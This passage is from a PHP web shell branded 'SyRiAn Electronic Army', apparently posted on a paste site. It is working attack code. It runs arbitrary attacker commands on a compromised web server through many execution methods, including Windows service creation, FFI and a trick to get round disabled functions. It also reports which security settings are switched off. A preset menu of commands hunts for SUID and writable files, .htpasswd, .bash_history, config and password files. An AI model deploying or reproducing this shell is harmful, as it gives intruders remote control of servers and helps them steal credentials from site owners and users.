  732.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  733.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  734. }
  735. function MySQL2() {
  736.     $mysql_try = function_exists('mysql_connect');
  737.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
  738.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  739. }
  740. function MSQL() {
  741.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  742.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  743. }
  744. function MysqlI() {
  745.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  746.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  747. }
  748. function Gzip() {
  749.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  750.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  751. }
  752. function openBaseDir() {
  753.     $openBaseDir = ini_get("open_basedir");
  754.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  755.     else {$openBaseDir = '<font color="red">ON</font>';}   
  756.     return $openBaseDir;
  757. }
  758. function Curl() {
  759.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  760.     else{$curl = '<font color="green">OFF</font>';}return $curl;
  761. }
  762. function magicQouts() {
  763.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  764.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  765.     else {$mag= '<font color="red">ON</font>';}return $mag;
  766. }
  767. function SafeMode() {
  768.     $safe_mode = ini_get("safe_mode");
  769.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  770.     else {$safe_mode = '<font color="red">ON</font>';}
  771.     return $safe_mode;
  772. }
  773. function DisableFunctions() {
  774.     $disfun = ini_get('disable_functions');
  775.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  776. }
  777. function RegisterGlobals() {
  778.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  779.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  780. }
  781. function GetRealIP() {
  782.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  783.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  784.     else {$ip=getenv(REMOTE_ADDR);}
  785.     return $ip;
  786. }
  787. function SelectCommand($os) {
  788.     global $os;
  789.     if($os == 'Windows') {
  790.         echo "
  791.         <select name='alias' id='alias' onChange='AddAlias();' >
  792.         <option value=''>NONE</option> 
  793.         <option value='dir' >List Directory</option>
  794.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  795.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
  796.         <option value='netstat -an'>Show active connections</option>
  797.         <option value='net start'>Show running services</option>
  798.         <option value='tasklist'>Show Pro</option>
  799.         <option value='net user'>User accounts</option>
  800.         <option value='net view'>Show computers</option>
  801.         <option value='arp -a'>ARP Table</option>
  802.         <option value='ipconfig /all'>IP Configuration</option>
  803.         <option value='netstat -an'>netstat -an</option>
  804.         <option value='systeminfo'>System Informations</option>
  805.         <option value='getmac'>Get Mac Address</option>
  806.         </select>
  807.         ";
  808.     }
  809.     else {
  810.         echo "
  811.         <select name='alias' id='alias' onChange='AddAlias();' >
  812.         <option value=''>NONE</option> 
  813.         <option value='ls -la'>List dir</option>
  814.         <option value='cat /etc/hosts'>IP Addresses</option>
  815.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  816.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  817.         <option value='netstat -an | grep -i listen'>show opened ports</option>
  818.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  819.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  820.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  821.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  822.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  823.         <option value='find / -type f -name \"config*\"'>find config* files</option>
  824.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  825.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  826.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  827.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  828.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  829.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  830.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  831.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  832.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  833.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  834.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  835.         <option value='locate httpd.conf'>locate httpd.conf files</option>
  836.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  837.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  838.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  839.         <option value='locate my.conf'>locate my.conf files</option>
  840.         <option value='locate admin.php'>locate admin.php files</option>
  841.         <option value='locate cfg.php'>locate cfg.php files</option>
  842.         <option value='locate conf.php'>locate conf.php files</option>
  843.         <option value='locate config.dat'>locate config.dat files</option>
  844.         <option value='locate config.php'>locate config.php files</option>
  845.         <option value='locate config.inc'>locate config.inc files</option>
  846.         <option value='locate config.inc.php'>locate config.inc.php</option>
  847.         <option value='locate config.default.php'>locate config.default.php files</option>
  848.         <option value='locate config'>locate config* files </option>
  849.         <option value='locate \".conf\"'>locate .conf files</option>
  850.         <option value='locate \".pwd\"'>locate .pwd files</option>
  851.         <option value='locate \".sql\"'>locate .sql files</option>
  852.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  853.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
  854.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  855.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  856.         <option value='locate backup'>locate backup files</option>
  857.         <option value='locate dump'>locate dump files</option>
  858.         <option value='locate priv'>locate priv files</option>
  859.         </select>
  860.         ";
  861.     }
  862. }
  863. function CSS($sh3llColor) {
  864.     $css =  "
  865.     <style>
  866.     BODY
  867.     {
  868.         FONT-FAMILY: Verdana;
  869.         margin: 2;
  870.         background-color: #000000;
  871.         color:white;
  872.         font-size:10pt;
  873.     }
  874.     sy  
  875.     {
  876.         color:".$sh3llColor.";
  877.         font-size:7pt;
  878.     }
  879.     #Box
  880.     {
  881.         color:".$sh3llColor.";
  882.         background-color:#000;
  883.         font-size:14px;
  884.         font-weight:bold;
  885.  
  886.         border:none;
  887.     }
  888.     table
  889.     {
  890.         border:none;
  891.         BORDER:  #eeeeee  outset;
  892.         BACKGROUND-COLOR: #000000;
  893.         color: #cccccc;
  894.         font-size:10px;
  895.     }
  896.     tr
  897.     {
  898.         BORDER-RIGHT:  #cccccc 1px solid;
  899.         BORDER-TOP:    #cccccc 1px solid;
  900.         BORDER-LEFT:   #cccccc 1px solid;
  901.         BORDER-BOTTOM: #cccccc 1px solid;
  902.         color: #ffffff;
  903.     }
  904.     td
  905.     {
  906.         BORDER-RIGHT:  #cccccc 1px solid;
  907.         BORDER-TOP:    #cccccc 1px solid;
  908.         BORDER-LEFT:   #cccccc 1px solid;
  909.         BORDER-BOTTOM: #cccccc 1px solid;
  910.         color: #cccccc;
  911.     }
  912.  
  913.     input
  914.     {
  915.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
  916.         BORDER-TOP:    ".$sh3llColor." 1px solid;
  917.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
  918.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
  919.         BACKGROUND-COLOR: #333333;
  920.         font: 9pt tahoma;
  921.         color: #ffffff;
  922.     }
  923.     select
  924.     {
  925.         BORDER-RIGHT:  #ffffff 1px solid;
  926.         BORDER-TOP:    #999999 1px solid;
  927.         BORDER-LEFT:   #999999 1px solid;
  928.         BORDER-BOTTOM: #ffffff 1px solid;
  929.         BACKGROUND-COLOR: #000000;
  930.         font: 9pt tahoma;
  931.         color: #CCCCCC;;
  932.     }
  933.     submit
  934.     {
  935.         BORDER:  1px outset buttonhighlight;
  936.         BACKGROUND-COLOR: #272727;
  937.         width: 40%;
  938.         color: #cccccc;
  939.     }
  940.     textarea
  941.     {
  942.         BORDER-RIGHT:  #ffffff 1px solid;
  943.         BORDER-TOP:    #999999 1px solid;
  944.         BORDER-LEFT:   #999999 1px solid;
  945.         BORDER-BOTTOM: #ffffff 1px solid;
  946.         BACKGROUND-COLOR: #333333;
  947.         color: #ffffff;
  948.     }
  949.     .Save{
  950.         width:500px;   
  951.         border-color:red;
  952.     }
  953.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  954.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  955.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  956.     A:hover {color:blue;TEXT-DECORATION: none;}
  957.     </style>
  958.     <script>
  959.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
  960.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  961.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
  962.     function change_dir_mode() {
  963.         var dir_mode = document.getElementById('dir_mode').value;
  964.         document.location = '?dir_mode='+dir_mode;
  965.     }
  966.     </script>
  967.     ";
  968.     return $css;
  969. }
  970. function filter($string) {
  971.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  972.     else{return $string;    }
  973. }
  974. function footer() {
  975.     echo '
  976.     <table width="100%">
  977.     <tr>
  978.     <td width="100%"><center>
  979.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
  980.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
  981.     <sy>  ~~<< </sy>sea.coders@hotmail.com<sy> >>~~</sy></b>
  982.     </center></td>
  983.     </tr>
  984.     </table>
  985.     </body></html>
  986.     ';
  987. }
  988. function print_exe_method() {
  989.     global $os; global $exec_method;
  990.     if($os == "Linux") {
  991.         ?>
  992.         <select name="exe_method" >
  993.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  994.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  995.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  996.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  997.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  998.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  999.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1000.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1001.         </select>
  1002.         <?php
  1003.     } else {
  1004.         ?>
  1005.         <select name="exe_method" >
  1006.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1007.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  1008.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  1009.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1010.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1011.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1012.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  1013.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  1014.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  1015.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1016.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1017.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  1018.         </select>
  1019.         <?php
  1020.     }
  1021. }
  1022. function Exe($command) {
  1023.     global $dir;global $os;global $exec_method;
  1024.     $command = filter($command);
  1025.    
  1026.     if($exec_method == "exec") {
  1027.         exec($command,$output);echo join("\n",$output);
  1028.     } else if($exec_method == "system") {
  1029.         system($command);
  1030.     } else if($exec_method == "shell_exec") {
  1031.         echo shell_exec($command);
  1032.     } else if($exec_method == "passthru") {
  1033.         passthru($command);
  1034.     } else if($exec_method == "proc_open") {
  1035.         echo proc_exec($command,$dir);
  1036.     } else if($exec_method == "popen") {
  1037.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  1038.     } else if($exec_method == "win_shell_execute") {
  1039.         echo winshell($command);
  1040.     } else if($exec_method == "win32_create_service") {
  1041.         echo srvshell($command);
  1042.     } else if($exec_method == "ffi") {
  1043.         echo ffishell($command);
  1044.     } else if($exec_method == "perl") {
  1045.         echo perlshell($command);
  1046.     } else if($exec_method == "python") {
  1047.         echo python_eval("import os\nos.system('".$command."')");
  1048.     } else if($exec_method == "slash_bypass") {
  1049.         echo slashBypass($command);
  1050.     }
  1051. }
  1052. function proc_exec($com , $dir) {
  1053.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  1054.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  1055.     return stream_get_contents($pipes[1]);
  1056. }
  1057. function winshell($command) {
  1058.     $name=whereistmP()."\\".uniqid('NJ');
  1059.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  1060.     sleep(1);
  1061.     $exec=file_get_contents($name);
  1062.     DeleteFile($name);
  1063.     return $exec;
  1064. }
  1065. function srvshell($command) {
  1066.     $name=whereistmP()."\\".uniqid('NJ');
  1067.     $n=uniqid('NJ');
  1068.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  1069.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  1070.     win32_start_service($n);
  1071.     win32_stop_service($n);
  1072.     win32_delete_service($n);
  1073.     while(!file_exists($name))sleep(1);
  1074.     $exec=file_get_contents($name);
  1075.     DeleteFile($name);
  1076.     return $exec;
  1077. }
  1078. function ffishell($command) {
  1079.     $name=whereistmP()."\\".uniqid('NJ');
  1080.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  1081.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  1082.     while(!file_exists($name))sleep(1);
  1083.     $exec=file_get_contents($name);
  1084.     DeleteFile($name);
  1085.     return $exec;
  1086. }
  1087. function perlshell($command) {
  1088.     $perl=new perl();
  1089.     ob_start();
  1090.     $perl->eval("system('".$command."')");
  1091.     $exec=ob_get_contents();
  1092.     ob_end_clean();
  1093.     return $exec;
  1094. }
  1095. function slashBypass($cmd) {
  1096.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  1097.     exec("\start cmd.bat");
  1098.     $content = file_get_contents('sy3.txt');
  1099.     unlink('sy3.txt');
  1100.     return $content;
  1101. }
  1102. function GenerateFile($name,$content) {
  1103.     if(function_exists('fopen') && function_exists('fclose')) {
  1104.         $file = fopen($name,"w+");
  1105.         if($file) {
  1106.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
  1107.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  1108.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  1109.             if(!$writeFile){return false;}
  1110.         }
  1111.         else{return false;}fclose($file);return true;
  1112.     }
  1113. }
  1114. function ScanDirs() {
  1115.     global $os; global $dir;global $safeMode;global $dir_mode;
  1116.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  1117.     else {
  1118.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
  1119. -----------------------------------------------------------------------------
  1120. ";
  1121.         $handel = opendir($dir);
  1122.         while(($file = readdir($handel))!= false)
  1123.         {
  1124.             $size = filesize($file);
  1125.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  1126.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  1127.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  1128.             $perms = fileperms($file);
  1129.             $time = date("y/m/d", filectime($file));
  1130.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  1131.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  1132.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
  1133. ";
  1134.         }
  1135.     }
  1136.     return $result;
  1137. }
  1138. echo footer();
  1139. ?>
RAW Paste Data